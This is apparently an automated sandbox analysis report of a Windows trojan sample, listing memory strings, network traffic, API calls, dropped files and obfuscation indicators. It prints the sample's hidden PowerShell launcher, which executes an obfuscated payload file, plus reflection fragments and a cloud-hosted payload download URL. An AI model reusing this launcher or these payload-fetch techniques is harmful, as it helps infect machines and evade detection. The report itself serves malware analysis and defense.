      Source: msiexec.exe, 00000007.00000002.3037606643.000000000960D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download.
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
      Source: msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
      Source: msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exeJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile created: C:\Windows\resources\0809\relegationenJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile created: C:\Windows\resources\0809\relegationen\ernringseksperternesJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004070400_2_00407040
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004068690_2_00406869
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00404B2B0_2_00404B2B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FED2787_2_02FED278
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE53627_2_02FE5362
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FEC1467_2_02FEC146
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FEC7387_2_02FEC738
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FEC4687_2_02FEC468
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FECA087_2_02FECA08
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FEE9887_2_02FEE988
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FECFAA7_2_02FECFAA
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FECCD87_2_02FECCD8
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE71187_2_02FE7118
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE3AA17_2_02FE3AA1
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE29EC7_2_02FE29EC
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE39ED7_2_02FE39ED
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FEE97A7_2_02FEE97A
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE3E097_2_02FE3E09
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FE9DE07_2_02FE9DE0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
      Source: 4Vx2rUlb0f.exe, 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs 4Vx2rUlb0f.exe
      Source: 4Vx2rUlb0f.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@5/5
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile created: C:\Users\user\AppData\Local\neoimpressionismJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
      Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile created: C:\Users\user\AppData\Local\Temp\nsr8037.tmpJump to behavior
      Source: 4Vx2rUlb0f.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 4Vx2rUlb0f.exeVirustotal: Detection: 75%
      Source: 4Vx2rUlb0f.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile read: C:\Users\user\Desktop\4Vx2rUlb0f.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\4Vx2rUlb0f.exe "C:\Users\user\Desktop\4Vx2rUlb0f.exe"
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: 4Vx2rUlb0f.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: \System.Core.pdb-2X3 source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000001.00000002.2706856166.000000000A8B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Anlgsbidragenes $Clockings $Lenstid), (Eutheria @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Andelsvirksomheden = [AppDomain]::CurrentDomain.GetAssembli
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Udbrydere)), $Overreservedly).DefineDynamicModule($Sneakbox, $false).DefineType($Forhandlingsvante, $Cometology, [System.MulticastDele
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_047FA5AF push eax; iretd 1_2_047FA639
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeFile created: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
